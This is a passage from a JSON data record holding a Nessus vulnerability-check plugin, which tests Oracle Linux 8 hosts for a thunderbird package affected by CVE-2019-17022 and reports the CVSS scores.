CSS sanitization does not escape HTML tags (CVE-2019-17022)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2020-January/009532.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected thunderbird package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:8\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 8\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"thunderbird-68.4.1-2.0.1.el8_1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"thunderbird\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}